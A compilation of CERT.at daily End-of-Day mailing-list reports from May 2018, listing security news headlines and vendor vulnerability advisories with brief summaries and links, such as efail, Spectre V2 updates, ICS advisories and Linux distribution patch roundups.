---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg2C1000380
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 15-05-2018 18:00 − Wednesday 16-05-2018 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Shadowy Hackers Accidentally Reveal Two Zero-Days to Security Researchers ∗∗∗
---------------------------------------------
An unidentified hacker group appears to have accidentally exposed two fully working zero-days when they uploaded a weaponized PDF file to a public malware scanning engine.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/shadowy-hackers-accidentally…
∗∗∗ UPnP joins the "just turn it off on consumer devices, already" club ∗∗∗
---------------------------------------------
Before it amplifies DDoS attacks. Universal Plug n Play, that eternal feast of the black-hat, has been identified as helping to amplify denial-of-service attacks.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2018/05/16/upnp_amplif…
∗∗∗ CPU vulnerability Spectre V2: microcode updates now available under Windows 10 1803, still patchy under Linux ∗∗∗
---------------------------------------------
Microcode updates for Intel processors, which are required under Windows to protect against the Spectre V2 vulnerability, are now also arriving via Windows Update for current installations; on Linux, however, there are still problems.
---------------------------------------------
https://www.heise.de/-4050379
=====================
= Vulnerabilities =
=====================
∗∗∗ Advantech WebAccess ∗∗∗
---------------------------------------------
This advisory includes mitigations for numerous vulnerabilities in Advantech's WebAccess products.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01
∗∗∗ Red Hat Addresses DHCP Client Vulnerability ∗∗∗
---------------------------------------------
Original release date: May 16, 2018. Red Hat has released security updates to address a vulnerability in its Dynamic Host Configuration Protocol (DHCP) client packages for Red Hat Enterprise Linux 6 and 7. An attacker could exploit this vulnerability to take control of an affected system.
---------------------------------------------
https://www.us-cert.gov/ncas/current-activity/2018/05/16/Red-Hat-Addresses-…
∗∗∗ XXE & XSS vulnerabilities in RSA Authentication Manager ∗∗∗
---------------------------------------------
RSA Authentication Manager is affected by several security vulnerabilities which can be exploited by an attacker to read arbitrary files, cause denial of service or attack other users of the web application with JavaScript code, browser exploits or Trojan horses.
---------------------------------------------
https://www.sec-consult.com/en/blog/advisories/xxe-xss-vulnerabilities-in-r…
∗∗∗ CVE-2018-8176 | Microsoft PowerPoint Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
Affected Products: Microsoft Office 2016 for Mac
Microsoft recommends that customers running Microsoft Office 2016 for Mac install the update to be protected from this vulnerability.
---------------------------------------------
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by CentOS (dhcp), Debian (xen), Fedora (dhcp, flac, kubernetes, leptonica, libgxps, LibRaw, matrix-synapse, mingw-LibRaw, mysql-mmm, patch, seamonkey, webkitgtk4, and xen), Mageia (389-ds-base, exempi, golang, graphite2, libpam4j, libraw, libsndfile, libtiff, perl, quassel, spring-ldap, util-linux, and wget), Oracle (dhcp and kernel), Red Hat (389-ds-base, chromium-browser, dhcp, docker-latest, firefox, kernel-alt, libvirt, qemu-kvm, redhat-virtualization-host, [...]
---------------------------------------------
https://lwn.net/Articles/754653/
∗∗∗ ZDI-18-468: (0Day) Delta Industrial Automation TPEditor TPE File Heap-based Buffer Overflow Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-18-468/
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities may affect IBM® SDK, Java™ Technology Edition ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22015806
∗∗∗ IBM Security Bulletin: Vulnerabilities in IBM GSKit and IBM GSKit-Crypto affect IBM Performance Management products ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016091
∗∗∗ IBM Security Bulletin: Open Source Apache Tomcat vulnerabilities affect IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2017-15698, CVE-2017-15706, CVE-2018-1304, CVE-2018-1305) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22015795
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Application Dependency Discovery Manager (TADDM) – IBM Java SDK updates Jan 2018 ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22015927
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Algo Credit Manager ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22015591
∗∗∗ IBM Security Bulletin: Vulnerabilities in libxml2 affect Intel® Manycore Platform Software Stack (Intel® MPSS) for Linux and Windows (CVE-2017-16931, CVE-2017-16932) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/home/docdisplay?lndocid=migr-5099803
∗∗∗ IBM Security Bulletin: IBM API Connect is affected by an OPENSSL vulnerability (CVE-2017-3735) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22015811
∗∗∗ [R1] Nessus 7.1.0 Fixes Multiple Vulnerabilities ∗∗∗
---------------------------------------------
http://www.tenable.com/security/tns-2018-05
∗∗∗ Oracle Java SE vulnerability CVE-2018-2799 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K33924005
=====================
= End-of-Day report =
=====================
Timeframe: Monday 14-05-2018 18:00 − Tuesday 15-05-2018 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Containers are here. What about container security? ∗∗∗
---------------------------------------------
The industry is gaga for container technologies like Docker and for good reason. According to ESG research, containers make up about 19 percent of hybrid cloud production workloads today, but in just two years' time, containers will make up one-third of hybrid cloud production workloads. (Note: I am an ESG employee.) Not surprisingly, cybersecurity professionals say rapid growth and proliferation of application containers have led to several security issues: [...]
---------------------------------------------
https://www.csoonline.com/article/3273347/security/containers-are-here-what…
∗∗∗ IDG Contributor Network: Fact vs. fiction: 6 myths about container security ∗∗∗
---------------------------------------------
DevOps, containers and microservices are eating software development just as software is eating the world. But with the explosive growth of these technologies and methodologies, it’s becoming increasingly difficult to separate fact from fiction. This is particularly the case when talking container security. In this article, we take a look specifically at the myths surrounding container security [...]
---------------------------------------------
https://www.csoonline.com/article/3272830/containers/fact-vs-fiction-6-myth…
∗∗∗ Code injection: security vulnerability in Signal's desktop client ∗∗∗
---------------------------------------------
A code-injection vulnerability in Signal's desktop client allows JavaScript to be executed remotely. An update for the Electron app is available. (Signal, security vulnerability)
---------------------------------------------
https://www.golem.de/news/code-injection-sicherheitsluecke-in-signals-deskt…
∗∗∗ Warning about CryptoCode ∗∗∗
---------------------------------------------
Consumers are receiving an e-mail from Bitcoin Austria. The message is an advertisement for CryptoCode. A link in the message leads to cryptocode.online. On that platform, visitors are asked to deposit money so that they can earn "$15,000" every day. The deposited money is lost, because there is no payout.
---------------------------------------------
https://www.watchlist-internet.at/news/warnung-vor-cryptocode/
∗∗∗ NIS Update ∗∗∗
---------------------------------------------
Austria should have implemented the NIS Directive by 9 May. We missed that. We still have no NIS law, and unfortunately not even a draft under review. But: part of the NIS subject matter (digital service providers) falls under full harmonisation and therefore takes effect directly from Brussels. The corresponding regulation was published in January and has been in force since 10 May. If you want to know [...]
---------------------------------------------
http://www.cert.at/services/blog/20180515161108-2242.html
=====================
= Vulnerabilities =
=====================
∗∗∗ SSA-914382 (Last Update: 2018-05-15): Denial-of-Service Vulnerability in SIMATIC S7-400 ∗∗∗
---------------------------------------------
SIMATIC S7-400 CPUs are affected by a security vulnerability which could lead to a Denial-of-Service condition of the PLC if specially crafted packets are received and processed. The affected SIMATIC S7-400 CPU hardware versions are in the product cancellation phase or already phased out. Siemens recommends that customers either upgrade to a new version or implement specific countermeasures.
---------------------------------------------
https://cert-portal.siemens.com/productcert/pdf/ssa-914382.pdf
∗∗∗ VMSA-2018-0011 ∗∗∗
---------------------------------------------
Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2018-0011.html
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (firefox, llpp, and webkit2gtk), Debian (kwallet-pam), Fedora (kernel and pam-kwallet), Gentoo (mpv), Oracle (389-ds-base, firefox, libvirt, and qemu-kvm), and Ubuntu (php5 and php5, php7.0, php7.1, php7.2).
---------------------------------------------
https://lwn.net/Articles/754495/
∗∗∗ BlackBerry powered by Android Security Bulletin - May 2018 ∗∗∗
---------------------------------------------
http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber…
∗∗∗ Red Hat JBoss Enterprise Application Platform: Multiple vulnerabilities allow, among other things, execution of arbitrary code ∗∗∗
---------------------------------------------
https://adv-archiv.dfn-cert.de/adv/2018-0922/
∗∗∗ IBM Security Bulletin: API Connect Developer Portal is affected by a Drupal vulnerability (CVE-2018-7602) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22015829
∗∗∗ IBM Security Bulletin: A vulnerability has been identified in IBM Spectrum Scale with CES stack enabled that could allow sensitive data to be included with service snaps. This data could be sent to IBM during service engagements (CVE-2018-1512) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=ssg1S1012325
∗∗∗ IBM Security Bulletin: A vulnerability affects the IBM FlashSystem model V840 ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=ssg1S1012281
∗∗∗ IBM Security Bulletin: A vulnerability affects the IBM FlashSystem models 840 and 900 ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012280
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities affect the IBM FlashSystem model V840 ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012283
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities affect the IBM FlashSystem models 840 and 900 ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012282
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012263
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM InfoSphere Information Server ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22015254
∗∗∗ IBM Security Bulletin: IBM Data Risk Manager has released VM v2.0.1 in response to the vulnerability known as Spectre. ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22013157
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Rational Application Developer for WebSphere Software ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016207
∗∗∗ Linux kernel vulnerability CVE-2018-8897 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K17403481
=====================
= End-of-Day report =
=====================
Timeframe: Friday 11-05-2018 18:00 − Monday 14-05-2018 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ #efail #fail ∗∗∗
---------------------------------------------
Reports are currently circulating (Twitter, ars technica, EFF, ...) about a security problem with encrypted mails. The EFF goes as far as recommending that various tools be uninstalled. While I was writing this blog post, the researchers went online with their results: https://efail.de/ Yay! A vuln with a cool name and logo. Here are the most important points: The problem is not the encryption, but lies in the automatic [...]
---------------------------------------------
http://www.cert.at/services/blog/20180514123156-2221.html
∗∗∗ Cross-platform apps developed with Electron vulnerable to attack ∗∗∗
---------------------------------------------
Cross-platform desktop apps built with the Electron framework can contain a dangerous security vulnerability that makes a cross-site scripting attack on them conceivable. The Electron team is providing an update.
---------------------------------------------
https://www.heise.de/-4048915
∗∗∗ Some notes on eFail ∗∗∗
---------------------------------------------
I've been busy trying to replicate the "eFail" PGP/SMIME bug. I thought I'd write up some notes. PGP and S/MIME encrypt emails, so that eavesdroppers can't read them. The bugs potentially allow eavesdroppers to take the encrypted emails they've captured and resend them to you, reformatted in a way that allows them to decrypt the messages. Disable remote/external content in email: The most important defense is to disable "external" or "remote" content from being [...]
---------------------------------------------
https://blog.erratasec.com/2018/05/some-notes-on-efail.html
=====================
= Vulnerabilities =
=====================
∗∗∗ Security Bulletins Posted ∗∗∗
---------------------------------------------
Adobe has published security bulletins for Adobe Acrobat and Reader (APSB18-09) and Adobe Photoshop CC (APSB18-17). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant bulletin.
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1553
∗∗∗ Rockwell Automation FactoryTalk Activation Manager ∗∗∗
---------------------------------------------
This advisory was posted originally to the HSIN ICS-CERT library on April 12, 2018, and is being released to the NCCIC/ICS-CERT website. This advisory contains mitigations for cross-site scripting and improper restriction of operations within the bounds of a memory buffer vulnerabilities in Rockwell Automation's FactoryTalk Activation Manager products.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-102-02
∗∗∗ Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet ∗∗∗
---------------------------------------------
MyBiz MyProcureNet is affected by a critical arbitrary file upload vulnerability allowing an attacker to compromise the server by uploading a web shell for issuing OS commands. Furthermore, it is affected by cross-site scripting issues.
---------------------------------------------
https://www.sec-consult.com/en/blog/advisories/arbitrary-file-upload-cross-…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (tiff and tiff3), Fedora (glusterfs, kernel, libgxps, LibRaw, postgresql, seamonkey, webkit2gtk3, wget, and xen), Mageia (afflib, flash-player-plugin, imagemagick, qpdf, and transmission), openSUSE (Chromium, opencv, and xen), SUSE (kernel), and Ubuntu (firefox).
---------------------------------------------
https://lwn.net/Articles/754430/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 09-05-2018 18:00 − Friday 11-05-2018 18:00
Handler: Stefan Lenzhofer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Upcoming Security Updates for Adobe Acrobat and Reader (APSB18-09) ∗∗∗
---------------------------------------------
A prenotification Security Advisory (APSB18-09) has been posted regarding upcoming Adobe Acrobat and Reader updates scheduled for Monday, May 14, 2018. We will continue to provide updates on the upcoming release via the Security Advisory as well as the Adobe … [...]
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1553
∗∗∗ Researchers Come Up With a Way to Launch Rowhammer Attacks via Network Packets ∗∗∗
---------------------------------------------
Five academics from the Vrije University in Amsterdam and one from the University of Cyprus have discovered a way for launching Rowhammer attacks via network packets and network cards.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/researchers-come-up-with-a-w…
∗∗∗ Vulnerability in Windows, Linux, macOS: developers misunderstood Intel documentation ∗∗∗
---------------------------------------------
Because their developers misunderstood the documentation of a CPU feature, almost all operating systems are now vulnerable to manipulation of kernel memory. Updates for the vulnerability have already been distributed.
---------------------------------------------
https://www.heise.de/security/meldung/Luecke-in-Windows-Linux-macOS-Entwick…
∗∗∗ ATM attacks: How hackers are going for gold ∗∗∗
---------------------------------------------
Imagine winning the lottery and having an ATM spit huge amounts of cash at you. That's exactly what some cyber criminals are after. They're targeting ATMs and launching "jackpotting" attacks, forcing them to dispense bills like a winning slot machine.
---------------------------------------------
https://www.helpnetsecurity.com/2018/05/11/atm-attacks/
∗∗∗ Security vulnerability in the "Signal" app for Mac ∗∗∗
---------------------------------------------
Messages that are supposed to disappear live on in the notification bar.
---------------------------------------------
http://derstandard.at/2000079519326
∗∗∗ One year later: EternalBlue exploit more popular now than during WannaCryptor outbreak ∗∗∗
---------------------------------------------
The infamous outbreak may no longer be causing mayhem worldwide, but the threat that enabled it is still very much alive and poses a major risk to unpatched and unprotected systems.
---------------------------------------------
https://www.welivesecurity.com/2018/05/10/one-year-later-eternalblue-exploi…
∗∗∗ LG patches RCE bug in smartphone keyboards ∗∗∗
---------------------------------------------
LG on Monday released a security update fixing a high-severity remote code execution vulnerability found in the default keyboards of all its mainstream smartphone models.
---------------------------------------------
https://www.scmagazineuk.com/news/lg-patches-rce-bug-in-smartphone-keyboard…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (freetype2, libraw, and powerdns), CentOS (389-ds-base and kernel), Debian (php5, prosody, and wavpack), Fedora (ckeditor, fftw, flac, knot-resolver, patch, perl, and perl-Dancer2), Mageia (cups, flac, graphicsmagick, libcdio, libid3tag, and nextcloud), openSUSE (apache2), Oracle (389-ds-base and kernel), Red Hat (389-ds-base and flash-plugin), Scientific Linux (389-ds-base), Slackware (firefox and wget), SUSE (xen), and Ubuntu (wget).
---------------------------------------------
https://lwn.net/Articles/754145/
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (libmupdf, mupdf, mupdf-gl, and mupdf-tools), Debian (firebird2.5, firefox-esr, and wget), Fedora (ckeditor, drupal7, firefox, kubernetes, papi, perl-Dancer2, and quassel), openSUSE (cairo, firefox, ImageMagick, libapr1, nodejs6, php7, and tiff), Red Hat (qemu-kvm-rhev), Slackware (mariadb), SUSE (xen), and Ubuntu (openjdk-8).
---------------------------------------------
https://lwn.net/Articles/754257/
∗∗∗ Oracle Java SE vulnerability CVE-2018-2783 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K44923228
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 08-05-2018 18:00 − Wednesday 09-05-2018 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ "Hide and Seek" Becomes First IoT Botnet Capable of Surviving Device Reboots ∗∗∗
---------------------------------------------
Security researchers have discovered the first IoT botnet malware strain that can survive device reboots and remain on infected devices after the initial compromise.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-…
∗∗∗ PoC Developed for CoinHive Mining In Excel Using Custom JavaScript Functions ∗∗∗
---------------------------------------------
Within days of Microsoft announcing that they are introducing custom JavaScript equations in Excel, a security researcher has developed a way to use this method to load the CoinHive in-browser JavaScript miner within Excel.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/poc-developed-for-coinhive-m…
∗∗∗ Call for speakers One Conference ∗∗∗
---------------------------------------------
The international One Conference 2018 will take place on October 2 & 3 in The Hague. Overall theme of this edition is "Merging Worlds – Securing the connected future".
---------------------------------------------
https://www.ncsc.nl/english/current-topics/news/call-for-speakers-one-confe…
∗∗∗ Nice Phishing Sample Delivering Trickbot, (Wed, May 9th) ∗∗∗
---------------------------------------------
Users have had to deal with phishing for a very long time. Today, most of them remain dumb messages quickly redacted with a simple attached file and a message like "Click on me, it's urgent!". Yesterday, I put my hands on a very nice sample that deserves to be dissected to demonstrate that phishing campaigns remain an excellent way to infect a computer!
---------------------------------------------
https://isc.sans.edu/diary/rss/23641
∗∗∗ Massive localstorage[.]tk Drupal Infection ∗∗∗
---------------------------------------------
After a series of critical Drupal vulnerabilities disclosed this spring, it’s not surprising to see a surge of massive Drupal infections like this one: [...]
---------------------------------------------
https://blog.sucuri.net/2018/05/massive-localstorage-tk-drupal-infection.ht…
∗∗∗ It's 2018, and a webpage can still pwn your Windows PC – and apps can escape Hyper-V ∗∗∗
---------------------------------------------
Scores of bugs, from Edge and Office to kernel code to Adobe Flash, need fixing ASAP. Patch Tuesday: Microsoft and Adobe have patched a bunch of security bugs in their products that can be exploited by hackers to commandeer vulnerable computers, siphon people's personal information, and so on.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2018/05/09/microsoft_w…
∗∗∗ Introducing Orchestrator decryption tool ∗∗∗
---------------------------------------------
Researched and written by Donny Maasland and Rindert Kramer. Introduction: During penetration tests we sometimes encounter servers running software that uses sensitive information as part of the underlying process, such as Microsoft's System Center Orchestrator. According to Microsoft, Orchestrator is a workflow management solution for data centers and can be used to automate the creation, [...]
---------------------------------------------
https://blog.fox-it.com/2018/05/09/introducing-orchestrator-decryption-tool/
∗∗∗ Better protection for networked medical devices ∗∗∗
---------------------------------------------
https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2018/sicherheits…
∗∗∗ Gandcrab Ransomware Walks its Way onto Compromised Sites ∗∗∗
---------------------------------------------
This blog post was authored by Nick Biasini with contributions from Nick Lister and Christopher Marczewski. Despite the recent decline in the prevalence of ransomware in the threat landscape, Cisco Talos has been monitoring the now widely distributed ransomware called Gandcrab. Gandcrab uses both traditional spam campaigns as well as multiple exploit kits, including Rig and Grandsoft.
---------------------------------------------
https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html
∗∗∗ Google CTF 2018 is here ∗∗∗
---------------------------------------------
https://security.googleblog.com/2018/05/google-ctf-2018-is-here.html
∗∗∗ Fake Mobilis GmbH order spreads malware ∗∗∗
---------------------------------------------
Criminals are sending out a fake order from Mobilis GmbH. In the business letter they ask companies to open the attachment for further information about the purchase. In reality it hides malware. For this reason it is important that recipients do not open the supposed order and move the message to their spam folder.
---------------------------------------------
https://www.watchlist-internet.at/news/gefaelschte-mobilis-gmbh-bestellung-…
=====================
= Vulnerabilities =
=====================
∗∗∗ CVE-2018-8897 ∗∗∗
---------------------------------------------
Media reports are currently circulating about a bug in how operating
systems handle Intel and AMD CPUs, and we have received the first
queries regarding its criticality. We do not consider it dramatic:
according to current knowledge, the bug is exploitable neither remotely
nor via JavaScript etc., and is therefore "only" a classic privilege
escalation.
---------------------------------------------
http://www.cert.at/services/blog/20180509142228-2199.html
∗∗∗ Silex Technology SX-500/SD-320AN or GE Healthcare MobileLink ∗∗∗
---------------------------------------------
This medical advisory includes mitigations for improper authentication
and OS command injection vulnerabilities in Silex Technology SX-500,
SD-320AN, and GE Healthcare MobileLink devices.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSMA-18-128-01
∗∗∗ Siemens Medium Voltage SINAMICS Products ∗∗∗
---------------------------------------------
This advisory includes mitigations for improper input validation
vulnerabilities in Siemens SINAMICS modular drive systems.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-128-01
∗∗∗ Siemens Siveillance VMS ∗∗∗
---------------------------------------------
This advisory includes mitigations for a deserialization of untrusted
data vulnerability in the Siemens Siveillance Video Management
Software.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-128-02
∗∗∗ Siemens Siveillance VMS Video Mobile App ∗∗∗
---------------------------------------------
This advisory includes mitigations for an improper certificate
validation vulnerability in the Siemens Siveillance VMS mobile app.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-128-03
∗∗∗ May 2018 Office Update Release ∗∗∗
---------------------------------------------
The May 2018 Public Update releases for Office are now available! This
month, there are 30 security updates and 22 non-security updates. All
of the security and non-security updates are listed in KB article
4133083.
---------------------------------------------
https://blogs.technet.microsoft.com/office_sustained_engineering/2018/05/08…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (kernel), Gentoo (rsync),
openSUSE (Chromium), Oracle (kernel), Red Hat (kernel and kernel-rt),
Scientific Linux (kernel), SUSE (kernel and php7), and Ubuntu (dpdk,
libraw, linux, linux-lts-trusty, linux-snapdragon, and webkit2gtk).
---------------------------------------------
https://lwn.net/Articles/754021/
∗∗∗ Security Update Summary ∗∗∗
---------------------------------------------
https://portal.msrc.microsoft.com/en-us/security-guidance/summary
∗∗∗ Security Advisory - Authentication Bypass Vulnerability in Some Smart Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2018/huawei-sa-20180509-…
∗∗∗ Security Advisory - Authentication Bypass Vulnerability in Huawei iBMC Products ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2018/huawei-sa-20180509-…
∗∗∗ [R1] OpenSSL Stand-alone Patch Available for SecurityCenter versions 5.0 or Later ∗∗∗
---------------------------------------------
http://www.tenable.com/security/tns-2018-04
∗∗∗ Oracle Java SE vulnerability CVE-2018-2811 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K01294982
∗∗∗ Oracle Java SE vulnerability CVE-2018-2796 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K71021401
∗∗∗ Oracle Java SE vulnerability CVE-2018-2798 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K24593421
Next End-of-Day report: 2018-05-11
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily